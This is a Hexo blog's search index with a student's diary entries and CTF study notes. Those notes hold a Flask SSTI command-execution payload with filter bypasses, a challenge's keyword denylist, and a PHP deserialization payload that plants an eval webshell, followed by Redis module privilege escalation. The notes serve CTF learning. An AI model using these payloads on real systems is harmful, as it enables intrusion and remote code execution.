1549 lines (741 loc) · 442 KB
local-search.xml
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>diary</title>
<link href="/2026/01/05/diary-2026-1-4/"/>
<url>/2026/01/05/diary-2026-1-4/</url>
<content type="html"><![CDATA[<h1 id="2026-1-4-13-04-05"><a href="#2026-1-4-13-04-05" class="headerlink" title="2026_1_4 13:04:05"></a>2026_1_4 13:04:05</h1><ul><li><p>Sharing a website today:<br><a href="https://idcflare.com/">idcflare</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202601041333515.png" srcset="/img/loading.gif" lazyload alt="site screenshot"><br>A pretty good resource-sharing site whose goal is to get back to the clean internet of the early days. I've had enough of CSDN.</p></li><li><p>Continued C coding today, finished roughly one chapter, about ten problems.<br>In the afternoon I went to get my eyes checked and to buy new shoes. The eye result came back: conjunctivitis. Apply some medication and get to bed earlier; no more staying up late, I need more rest every day.</p></li><li><p>Continuing the reading notes on the Win32 API; I basically only finished the preface and got a sense of the basic learning path. I plan to finish this book this month. These past two days I found a lot more material, but really I don't need to look for anything new at all; it's better to first finish the older material on my own study sites.</p></li><li><p>I feel the word count still needs to be higher, and I should revise my articles repeatedly; each one should probably reach at least 400-500 characters.</p></li></ul><h1 id="2026-1-5-19-48-56"><a href="#2026-1-5-19-48-56" class="headerlink" title="2026_1_5 19:48:56"></a>2026_1_5 19:48:56</h1><ul><li><p>Thinking about it, to pad the word count I'd rather make this post longer first and split it up later when I have ideas. After that I also need to properly tidy up my earlier posts; a lot of junk and incomplete ones can be sorted out, and I should use drafts more. I only started writing code this afternoon and I'm still drowsy; I can't write much per day. Not sure I'll even finish today's 6 problems, and I haven't started the book yet.</p></li><li><p>I really feel it's easier to study at school. At home, as soon as someone comes over in the afternoon it's deafening and I can't get anything done. I wanted to sleep but now I'm still groggy; I plan to take a short nap and then start writing code.</p></li><li><p>Another idea: I could post my own code here, provided it's somewhat interesting, otherwise it's a bit thin. Oh, and last night I was still thinking about my video plan: I should publish one article every Saturday and Sunday; a 15~20 min video needs a script of about 5000 characters, so I also have to find time to write scripts. So many things to do, and I haven't done anything this morning.</p></li><li><p>I also forgot to mention the information feed thing. I'm also working on my graduation project, and there's that network design I'd forgotten about. Later I still need to add external links and RSS to the site; not sure whether I forgot to add them before or what. Oh, and later I want to rebuild the site with Django, probably several months from now. Anyway, that's it for now.</p></li></ul><h1 id="2026-1-6-20-53-34"><a href="#2026-1-6-20-53-34" class="headerlink" title="2026_1_6 20:53:34"></a>2026_1_6 20:53:34</h1><ul><li>Just had a look at obstain's fully automated local-network auto-upload; it really is nice. Also, this blog's update process has some issues; I expect no updates in the next few days while I focus on update-related work. Looking forward to seeing you all next week.</li></ul>]]></content>
<tags>
<tag>diary</tag>
</tags>
</entry>
<entry>
<title>A New Beginning</title>
<link href="/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/"/>
<url>/2025/12/25/%E6%96%B0%E7%9A%84%E5%BC%80%E5%A7%8B/</url>
<content type="html"><![CDATA[<h2 id="过去的总结"><a href="#过去的总结" class="headerlink" title="Looking back"></a>Looking back</h2><p>The postgraduate entrance exam is more or less behind me now; there is still a lot to get to next, so let me set the tone first. The blog does need to move over to Hexo. Notion was convenient, but it still felt lacking in places; in the end the native, self-hosted approach works better. In the words of Marxist philosophy, it's the negation of the negation.</p><h2 id="之后的目标"><a href="#之后的目标" class="headerlink" title="Goals from here on"></a>Goals from here on</h2><p>Let me set a few goals by priority and urgency.</p><h3 id="急迫"><a href="#急迫" class="headerlink" title="Urgent"></a>Urgent</h3><ol><li>The C programming course on January 15, right ahead</li><li>And the graduation project</li></ol><h3 id="中等"><a href="#中等" class="headerlink" title="Medium"></a>Medium</h3><ol><li>Finish the book C++ Disassembly and Reverse Analysis</li><li>Reverse more of the C code I write myself</li><li>Some pwn and some web (pwpw and wewe)</li></ol><h3 id="较弱"><a href="#较弱" class="headerlink" title="Low"></a>Low</h3><ol><li>Finish The Witcher 3</li></ol><h3 id="额外目标"><a href="#额外目标" class="headerlink" title="Extra goals"></a>Extra goals</h3><ol><li>Plan to rebuild my blog with Django</li><li>Plan to write a CTF aggregator site</li></ol><h3 id="变成习惯"><a href="#变成习惯" class="headerlink" title="Turn into habits"></a>Turn into habits</h3><ul><li>Study English</li></ul><p>That's it for now; I'll gradually upload the Notion content and the material from these past few months to the site.</p>]]></content>
<tags>
<tag>diary</tag>
</tags>
</entry>
<entry>
<title>2025</title>
<link href="/2025/02/24/2025/"/>
<url>/2025/02/24/2025/</url>
<content type="html"><![CDATA[<p>In the blink of an eye it's already 2025. Last year's worries haven't cleared and this year's are already at the door. This post is part encouragement, part warning. It's not that I'm so busy; there really isn't that much going on. Getting the following things done is what's needed right now:</p><ul><li><p>Finish the programming course</p></li><li><p>Keep studying web-related knowledge to prepare for the upcoming HVV</p></li><li><p>Get everything ready for the postgraduate entrance exam<br>There aren't many classes this semester, so there is time to improve on the technical side; I'll fill in the rest as it comes to mind<br>ps: exercise needs to keep up too. I always want to play games and can't help playing instead of improving myself; fixing that counts as something to get done as well</p></li><li><p>Personal abilities<br><img src="https://gitee.com/fogpost/photo/raw/master/202502241730506.png" srcset="/img/loading.gif" lazyload></p></li></ul>]]></content>
</entry>
<entry>
<title>Small JS notes for the web</title>
<link href="/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/"/>
<url>/2025/01/11/web%E7%9A%84js%E5%B0%8F%E7%9F%A5%E8%AF%86/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>A JavaScript tutorial: many small browser games are built on JS.<br>JavaScript is one of the 3 languages a web developer must learn:<br> HTML defines the content of a web page<br> CSS describes the layout of a web page<br> JavaScript controls the behaviour of a web page</p><h2 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h2><figure class="highlight javascript"><pre><code class="hljs javascript">[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</code></pre></figure><p>This snippet is alert(1); just run it in the developer tools console.</p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>Flask template injection</title>
<link href="/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/"/>
<url>/2025/01/10/flask%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/</url>
<content type="html"><![CDATA[<h1 id="flask模板注入"><a href="#flask模板注入" class="headerlink" title="Flask template injection"></a>Flask template injection</h1><p>As one of the harder topics in web security, it is worth exploring.<br>Reference: <a href="https://xz.aliyun.com/t/3679?time__1311=n4+xnii=oGqmqDK0QDODlx6e0=bG=KtezkWGb84D">Flask SSTI template injection from zero to beginner</a></p><h2 id="模板代码"><a href="#模板代码" class="headerlink" title="Template code"></a>Template code</h2><p>The code is in Python, using the Flask framework with Jinja2 templates; Flask and Jinja2 have to be installed separately, and PyCharm may make this a bit easier.<br>Note: <code>index</code> has no vulnerability; the vulnerable point is in <code>test</code>.</p><figure class="highlight python"><pre><code class="hljs python">from flask import Flask
from flask import render_template
from flask import request
from flask import render_template_string

app = Flask(__name__)

@app.route('/')
@app.route('/index')  # visiting / or /index both land here
def index():
    # safe: the user value is passed as template *data*, not as template source
    return render_template("index.html", title='Home', user=request.args.get("key"))

@app.route('/test', methods=['GET', 'POST'])
def test():
    # vulnerable: request.url is spliced into the template *source* before rendering,
    # so any Jinja2 syntax in the URL is evaluated by the template engine (SSTI)
    template = '''
    <div class="center-content error">
        <h1>Oops! That page doesn't exist.</h1>
        <h3>%s</h3>
    </div>
    ''' % request.url

    return render_template_string(template)

if __name__ == '__main__':
    app.debug = True
    app.run()
</code></pre></figure><h3 id="示例-index-html"><a href="#示例-index-html" class="headerlink" title="Example index.html"></a>Example <code>index.html</code></h3><figure class="highlight html"><pre><code class="hljs html"><html>
    <head>
        <title>{{ title }} - 小猪佩奇</title>
    </head>
    <body>
        <h1>Hello, {{ user.name }}!</h1>
    </body>
</html>
</code></pre></figure><h3 id="SSTI-利用示例"><a href="#SSTI-利用示例" class="headerlink" title="SSTI exploitation example"></a>SSTI exploitation example</h3><p>Using Python's class inheritance, we can walk back up the hierarchy and reach other functions.<br>The target is usually <code><class 'os._wrap_close'></code>; its index differs per version and is <code>133</code> in Python 3.8.</p><figure class="highlight text"><pre><code class="hljs text">http://127.0.0.1:5000/test?key={{"".__class__.__bases__[0].__subclasses__()[133].__init__.__globals__['popen']('dir').read()}}
</code></pre></figure><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101750658.png" srcset="/img/loading.gif" lazyload></p><h2 id="CTF-中的一些绕过-Tips"><a href="#CTF-中的一些绕过-Tips" class="headerlink" title="Some bypass tips in CTF"></a>Some bypass tips in CTF</h2><ol><li><p><strong>Brackets such as <code>[]</code> filtered</strong><br>Bypass with <code>__getitem__</code>. For example, original POC: <code>{{"".__class__.__bases__[0]}}</code><br>After bypass: <code>{{"".__class__.__bases__.__getitem__(0)}}</code></p></li><li><p><strong><code>subclasses</code> filtered: string concatenation</strong><br>Original POC: <code>{{"".__class__.__bases__[0].__subclasses__()}}</code><br>After bypass: <code>{{"".__class__.__bases__[0]['__subcla' + 'sses__']}}</code></p></li><li><p><strong><code>class</code> filtered</strong><br>Bypass with <code>session</code>:<br>POC: <code>{{session['__cla' + 'ss__'].__bases__[0].__bases__[0].__bases__[0].__bases__[0].__subclasses__()[133]}}</code></p><p>The repeated <code>__bases__[0]</code> is there because we keep walking up to the <code>object</code> class. Using <code>__mro__</code> is more convenient: </p><ul><li><code>{{session['__cla' + 'ss__'].__mro__[12]}}</code><br>or </li><li><code>{{request['__cl' + 'ass__'].__mro__[12]}}</code></li></ul></li></ol><!-- 4. **`timeit` trick** --><p>Example: <a href="https://www.secpulse.com/archives/65568.html">a Python sandbox challenge from 2017 SWPU-CTF</a></p><h2 id="一张图总结一下-SSTI-的一些模板渲染引擎及利用"><a href="#一张图总结一下-SSTI-的一些模板渲染引擎及利用" class="headerlink" title="One picture summarising SSTI template engines and their exploitation"></a>One picture summarising SSTI template engines and their exploitation</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501101756362.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>CISCN writeup reproduction</title>
<link href="/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/"/>
<url>/2025/01/10/ciscnwp%E5%A4%8D%E7%8E%B0/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>Mustering the courage to face CISCN, slowly reproducing it against the writeups. Keep going, keep going, keep going!</p><h2 id="web"><a href="#web" class="headerlink" title="web"></a>web</h2><h3 id="hello-web"><a href="#hello-web" class="headerlink" title="hello_web"></a>hello_web</h3><p>A classic SSRF; we had actually nearly finished it, but we got stuck at the AntSword bypass and so never got through. I wrote a separate article on the AntSword bypass, so I won't repeat it here. The challenge itself also involves a double-write bypass and a PHP quirk: [ is converted to _</p><h3 id="Safe-Proxy"><a href="#Safe-Proxy" class="headerlink" title="Safe_Proxy"></a>Safe_Proxy</h3><figure class="highlight py"><pre><code class="hljs py">from flask import Flask, request,render_template_string
import socket
import threading
import html

app = Flask(__name__)

@app.route('/', methods=["GET"])
def source():
    # GET / returns the challenge's own source, HTML-escaped
    with open(__file__, 'r', encoding='utf-8') as f:
        return '<pre>'+html.escape(f.read())+'</pre>'

@app.route('/', methods=["POST"])
def template():
    template_code = request.form.get("code")
    # security filter (the challenge's blacklist; user input still reaches render_template_string below,
    # so this is a keyword denylist in front of an SSTI sink, not a fix)
    blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n']
    for black in blacklist:
        if black in template_code:
            return "Forbidden content detected!"
    result = render_template_string(template_code)
    print(result)
    # the rendered output is only printed server-side; the client just gets 'ok' or 'error'
    return 'ok' if result is not None else 'error'

class HTTPProxyHandler:
    def __init__(self, target_host, target_port):
        self.target_host = target_host
        self.target_port = target_port

    def handle_request(self, client_socket):
        try:
            request_data = b""
            while True:
                chunk = client_socket.recv(4096)
                request_data += chunk
                if len(chunk) < 4096:
                    break

            if not request_data:
                client_socket.close()
                return

            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket:
                proxy_socket.connect((self.target_host, self.target_port))
                proxy_socket.sendall(request_data)

                response_data = b""
                while True:
                    chunk = proxy_socket.recv(4096)
                    if not chunk:
                        break
                    response_data += chunk

                # strip the backend's headers and re-wrap only the body in a fixed 200 response
                header_end = response_data.rfind(b"\r\n\r\n")
                if header_end != -1:
                    body = response_data[header_end + 4:]
                else:
                    body = response_data

                response_body = body
                response = b"HTTP/1.1 200 OK\r\n" \
                           b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \
                           b"Content-Type: text/html; charset=utf-8\r\n" \
                           b"\r\n" + response_body

                client_socket.sendall(response)
        except Exception as e:
            print(f"Proxy Error: {e}")
        finally:
            client_socket.close()

def start_proxy_server(host, port, target_host, target_port):
    proxy_handler = HTTPProxyHandler(target_host, target_port)
    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_socket.bind((host, port))
    server_socket.listen(100)
    print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...")

    try:
        while True:
            client_socket, addr = server_socket.accept()
            print(f"Connection from {addr}")
            thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,))
            thread.daemon = True
            thread.start()
    except KeyboardInterrupt:
        print("Shutting down proxy server...")
    finally:
        server_socket.close()

def run_flask_app():
    app.run(debug=False, host='127.0.0.1', port=5000)

if __name__ == "__main__":
    proxy_host = "0.0.0.0"
    proxy_port = 5001
    target_host = "127.0.0.1"
    target_port = 5000

    # secure reverse proxy, prevents attacks targeting the response headers
    proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port))
    proxy_thread.daemon = True
    proxy_thread.start()

    print("Starting Flask app...")
    run_flask_app()
</code></pre></figure>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>bypass</title>
<link href="/2025/01/09/bypass/"/>
<url>/2025/01/09/bypass/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>At the Great Wall Cup I ran into a bypass I didn't recognise and couldn't beat it however hard I tried, so I came here to train.</p><h2 id="天翼杯-2021-esay-eval"><a href="#天翼杯-2021-esay-eval" class="headerlink" title="[天翼杯 2021]esay_eval"></a><a href="https://www.nssctf.cn/problem/364">[天翼杯 2021]esay_eval</a></h2><figure class="highlight php"><pre><code class="hljs php"><?php
class A{
    public $code = "";
    // Any call to an undefined method evaluates the stored code
    function __call($method,$args){
        eval($this->code);
    }
    // __wakeup clears the code during unserialize, so it must be skipped
    function __wakeup(){
        $this->code = "";
    }
}

class B{
    // Calling an undefined method on $this->a triggers A::__call
    function __destruct(){
        echo $this->a->a();
    }
}
if(isset($_REQUEST['poc'])){
    // The property count after "A": or "B": must be exactly 1
    preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
    if (isset($ret[1])) {
        foreach ($ret[1] as $i) {
            if(intval($i)!==1){
                exit("you want to bypass wakeup ? no !");
            }
        }
        unserialize($_REQUEST['poc']);
    }
}else{
    highlight_file(__FILE__);
}
</code></pre></figure><p>First the input is run through a regex that captures the number after the class names A and B and requires it to be 1, while skipping<br>__wakeup needs that number to be greater than 1. Since PHP class names are case-insensitive, the check is bypassed by using lowercase class names. Payload:</p><p>A very easy deserialization; the one point to note is that PHP's case-insensitive class names let the payload slip past the regex in the challenge: when building the payload, write the class names as a and b.</p><figure class="highlight php"><pre><code class="hljs php"><?php
class a{

    public $code = "";
    function __construct(){
        //$this->code="phpinfo();";
        $this->code="eval(\$_GET['pass']);";// drop a webshell in
    }

}
class b{
    public $a;
    function __construct(){
        $this->a=new a();
    }
}
echo serialize(new b());
# Finally change the property count of class b so that it is not 1, which gets past the __wakeup magic method
#O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}
# change it to O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:10:"phpinfo();";}}

# final payload:
# O:1:"b":2:{s:1:"a";O:1:"a":1:{s:4:"code";s:21:"eval($_POST['pass']);";}}
</code></pre></figure><p>Connect with AntSword<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091121732.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091120750.png" srcset="/img/loading.gif" lazyload><br>Permissions turn out to be insufficient, so try the AntSword plugin that brute-force bypasses<br>disable_functions (the Antsword plugin)<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091213124.png" srcset="/img/loading.gif" lazyload></p><p>A .swp file also shows up here; this is a leaked vim swap file, so try to recover it</p><blockquote><p>When a developer edits a file with the vim editor, a backup file is created automatically; when editing finishes and the file is saved, the original is updated and the backup is deleted automatically.<br>But when the editing session ends unexpectedly, the backup file remains, and if the file is edited and abnormally exited several times, the backups are not overwritten but are saved in turn under other extensions such as swp, swo and swn.</p></blockquote><p>Recover it with vim: vim -r XXXX.php.swp<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091224047.png" srcset="/img/loading.gif" lazyload><br>The Redis configuration is found here; try connecting</p><p>At this point the exp.so file has to be downloaded and used; a short explanation of exp.so</p><blockquote><p>In Redis, the exp.so file is commonly used as a way of escalating privileges through Redis. The file is a Redis module that can execute arbitrary code inside the Redis server.<br>Redis modules are pluggable extensions that let users add new functionality to a Redis server. exp.so is a Redis module that provides commands and functions allowing an attacker to execute arbitrary code in the Redis server and so take control of the machine.<br>In a Redis privilege-escalation attack, the attacker usually exploits a Redis vulnerability or weak password to gain access to the Redis server. Once access is obtained, the attacker can upload exp.so to the server and load it with the Redis module load command; the file then executes arbitrary code inside the Redis server and gives the attacker control of the machine</p></blockquote><p>EXP.SO:<a href="https://github.com/Dliv3/redis-rogue-server">https://github.com/Dliv3/redis-rogue-server</a></p><p>Then escalate privileges through Redis<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091255627.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501091256738.png" srcset="/img/loading.gif" lazyload><br>Pick any of them and run the command: the file has to be loaded with the module load command before RCE is possible, so type MODULE LOAD /var/www/html/exp.so in the virtual terminal.<br>After that commands can be executed and the flag can be read<br><img src="https://gitee.com/fogpost/photo/raw/master/202501091257489.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>nc port listening and reverse shells</title>
<link href="/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/"/>
<url>/2025/01/05/nc%E7%9B%91%E5%90%AC%E7%AB%AF%E5%8F%A3%E5%92%8C%E5%8F%8D%E5%BC%B9shell/</url>
<content type="html"><![CDATA[<p>nc [-hlnruz] [-g<gateway…>] [-G<pointer count>] [-i<delay seconds>] [-o<output file>] [-p<port>] [-s<source address>] [-v…] [-w<timeout seconds>] [hostname] [port…]</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052042662.png" srcset="/img/loading.gif" lazyload></p><p>Note that when nc is used with -l there is no obvious output on a successful connection, but the connection may already be established at that point<br><img src="https://gitee.com/fogpost/photo/raw/master/202501052046913.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202501052047210.png" srcset="/img/loading.gif" lazyload></p>]]></content>
<categories>
<category>WEB</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>A simple remote-control trojan</title>
<link href="/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/"/>
<url>/2025/01/05/%E7%AE%80%E5%8D%95%E7%9A%84%E8%BF%9C%E6%8E%A7%E6%9C%A8%E9%A9%AC%E5%95%8A/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>Playing around with trojans</p><h2 id="利用kali生成"><a href="#利用kali生成" class="headerlink" title="Generating it with Kali"></a>Generating it with Kali</h2><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052023460.png" srcset="/img/loading.gif" lazyload></p><p>Parameter meanings: -p: payload, i.e. target OS type / architecture / the control obtained over the target / make the target connect back to the attacking machine; -f: format, the file format; -o: output, the output file</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202501052058694.png" srcset="/img/loading.gif" lazyload><br>Configure the attack module</p>]]></content>
<categories>
<category>Penetration testing</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>webtest</title>
<link href="/2025/01/05/webtest/"/>
<url>/2025/01/05/webtest/</url>
<content type="html"><![CDATA[<h1 id="JSFUCK"><a href="#JSFUCK" class="headerlink" title="JSFUCK"></a>JSFUCK</h1><figure class="highlight scheme"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scheme">[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]][([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span 
class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+([][[]]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+([][[]]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span 
class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]]((<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]]+[<span class="hljs-name">+!+</span>[]]+(<span class="hljs-name">!!</span>[]+[][(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+([<span class="hljs-name">!</span>[]]+[][[]])[<span class="hljs-name">+!+</span>[]+[<span class="hljs-name"><span 
